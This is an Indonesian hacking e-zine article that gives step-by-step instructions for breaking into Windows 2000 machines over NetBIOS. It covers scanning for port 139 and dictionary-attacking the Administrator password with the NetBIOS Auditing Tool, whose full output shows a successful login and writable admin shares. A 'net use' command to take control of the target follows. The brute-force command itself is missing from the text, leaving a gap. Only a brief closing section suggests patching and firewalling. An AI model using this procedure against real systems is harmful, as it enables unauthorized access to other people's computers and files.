Issue‎ > ‎Issue 06‎ > ‎

005.txt


	____________________   ___ ___ ________   
	\_   _____/\_   ___ \ /   |   \\_____  \  
	 |    __)_ /    \  \//    ~    \/   |   \ 
	 |        \\     \___\    Y    /    |    \
	/_______  / \______  /\___|_  /\_______  /
	        \/         \/       \/         \/ 


					    .OR.ID


ECHO-ZINE RELEASE
       06

Author: inue_99 Csrg|| (http://csrg.cjb.net/~csrg/ ) inue_99@yahoo.com
Online @ www.echo.or.id :: http://ezine.echo.or.id

== Hacking Net Bios Windows 2000 sp 1 ==


Jaringan yang mendukung sistem input/output (NetBIOS) tidak lagi diperlukan 
untuk berkomunikasi dengan pc lain yang menggunakan sistem oprasi Microsoft 
windows. Meskipun demikian, sama dengan penggunaan protokol TCP/IP yang lain 
net bios masih banyak digunakan.

Hal ini sangatlah mengejutkan sebab semua jaringan microsoft sebelum windows 
2000 memerlukan NETBIOS sebagai pendukung protokol lainnya. Kebanyakan protokol 
ini berada pada bagian TCP/IP, IPX/SPX. Oleh karena itu administrator tidak 
mempunyai pilihan lain untuk menggunakan berbagai protokol, sebab tanpa protokol 
yang lain , produk microsoft tidak dapat berkomunikasi antara satu dan lainnya.

NET BIOS adalah suatu program aplikasi penghubung. NET BIOS dibuat oleh IBM dan 
SYTEK pada tahun 1984 untuk program jaringan pada pc mereka yang kemudian 
diadaptasikan oleh microsoft dan meliputi ms-dos versi 3.1. Sejak saat itu NET 
BIOS telah menjadi suatu worlwide yang standar. 

Netbios standard memungkinkan komunikasi aplikasi komputer yang berbeda untuk 
berkomunikasi ke berbagai protokol LOCAL AREA NETWORK (LAN), mencakup Internet 
Protokol (Ip). Bagaimanapun net bios tidaklah dengan sendirinya suatu menaklukkan 
mekanisme untuk berkomunikasi ke seberang suatu WIDE AREA NETWORK (WAN) Karena 
memerlukan bantuan dari mekanisme lain, seperti TCP.

Net Bios merupakan alat penghubung program untuk berkomunikasi dengan jaringan, 
kemudian bersandar pada tingkatan protokol yang lebih rendah seperti NetBEUI 
untuk mengirimkan informasi antar mesin. NetBEUI berfungsi sebagai media 
penghubung NetBIOS ke ke jaringan. 


Metoda pengujian
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  Sebelum memulai ada baik nya anda mempersiapkan utilitas dibawah ini :
1. IP Scanner (Advance IP Scanner )
2. Port Scanner (NMAP)
3. Win Nt Password Cracker ( NetBIOS Auditing Tool )
4. Database Password yang lumayan banyak.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
1. Cari Komputer target dengan IpScanner
2. Identifikasi port yang terbuka dengan menggunakan Nmap apakah port 139 terbuka
3. Jika sudah diketemuakan kitda dapat mencoba password dari windows 2000 tersebut 
dengan menggunakan nat (NetBIOS Auditing Tool) Dengan menggunakan perintah sbb pada 
command prompt:



Setelah perintah diatas dilakukan maka akan muncul sebagai berikut
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[*]--- Reading usernames from user.txt
[*]--- Reading passwords from pass.txt

[*]--- Checking host: 10.1.3.100
[*]--- Obtaining list of remote NetBIOS names
[*]--- Remote systems name tables:

     COMPUTER-CSRG
     COMPUTER-CSRG
     CSRG
     CSRG
     COMPUTER-CSRG
     INet~Services
     IS~COMPUTER-CSR

[*]--- Attempting to connect with name: *
[*]--- Unable to connect

[*]--- Attempting to connect with name: COMPUTER-CSRG
[*]--- CONNECTED with name: COMPUTER-CSRG
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Fri Jun 11 11:14:22 2004
[*]--- Timezone is UTC+7.0
[*]--- Remote server wants us to encrypt, telling it not to

[*]--- Attempting to connect with name: COMPUTER-CSRG
[*]--- CONNECTED with name: COMPUTER-CSRG
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ADMINISTRATOR'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `GUEST'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ROOT'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ADMIN'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `PASSWORD'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `TEMP'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `SHARE'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `WRITE'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `FULL'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `BOTH'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `READ'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `FILES'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `DEMO'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `TEST'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ACCESS'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `USER'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `BACKUP'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `SYSTEM'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `SERVER'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `LOCAL'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ADMINISTRATEUR'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `INVITE'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `invité'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `SAUVEGARDE'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `OPERATEUR'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `opérateur'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `UTILISATEUR'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `DUPLICATEUR'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `76182'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `123'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `hanya'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `123456'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `123456'

[*]--- Obtained server information:

Server=[COMPUTER-CSRG] User=[] Workgroup=[CSRG] Domain=[]

[*]--- This machine has a browse list:

Server Comment
--------- -------
COMPUTER-CSRG 
CSRG-4WAR 
WORKSHOP-SAMSOE 


[*]--- Attempting to access share: \\COMPUTER-CSRG\
[*]--- Unable to access

[*]--- Attempting to access share: \\COMPUTER-CSRG\ADMIN$
[*]--- WARNING: Able to access share: \\COMPUTER-CSRG\ADMIN$
[*]--- Checking write access in: \\COMPUTER-CSRG\ADMIN$
[*]--- WARNING: Directory is writeable: \\COMPUTER-CSRG\ADMIN$
[*]--- Attempting to exercise .. bug on: \\COMPUTER-CSRG\ADMIN$

[*]--- Attempting to access share: \\COMPUTER-CSRG\C$
[*]--- WARNING: Able to access share: \\COMPUTER-CSRG\C$
[*]--- Checking write access in: \\COMPUTER-CSRG\C$
[*]--- WARNING: Directory is writeable: \\COMPUTER-CSRG\C$
[*]--- Attempting to exercise .. bug on: \\COMPUTER-CSRG\C$

[*]--- Attempting to access share: \\COMPUTER-CSRG\D$
[*]--- WARNING: Able to access share: \\COMPUTER-CSRG\D$
[*]--- Checking write access in: \\COMPUTER-CSRG\D$
[*]--- WARNING: Directory is writeable: \\COMPUTER-CSRG\D$
[*]--- Attempting to exercise .. bug on: \\COMPUTER-CSRG\D$

[*]--- Attempting to access share: \\COMPUTER-CSRG\ROOT
[*]--- Unable to access

[*]--- Attempting to access share: \\COMPUTER-CSRG\WINNT$
[*]--- Unable to access

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Pada baris
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `123456'
menunjukan bahwa password sudah ditemukan dengan username ADMINISTRATOR dan 
Password password.
 
Setelah username dan password di temukan maka kita dapat melakukan koneksi ke 
computer target denggan menggunakan perintah sbb 
pada shel cmd 

net use \\\\COMPUTER-CSRG\ipc$ /user:administrator 123456
 

Jika yang muncul pesan ?The command completed successfully.? Berarti kita sudah
berhasil menguasai computer tersebut. Setelah itu kita dapat mengakses file 
yang terdapat pada komputer
tersebut. 


Solusi

Solusi untuk mencegah komputer anda di hack dengan cara tadi dapat dilakukan dengan 
beberapa cara antara lain dengan :
1. Mengupgrade service pack 4 yang dapat di download dari http://windowsupdate.microsoft.com 
2. Menggunakan Firewall untuk menutup port 139


REFERENSI a.k.a bacaan :
..... Windows NT Deconsctruction Tatics Step by Step NT Explotation 
Techniquesby vacuum of Rhino9 & Technotronic. (vacuum@technotronic.com)


*greetz to: 
All Csrg STMIK"ABG" Crew thanks buat cacian, makian, support, yang membantu 
selesainya tulisan ini.

kirimkan kritik && saran ke inue_99@yahoo.com
Comments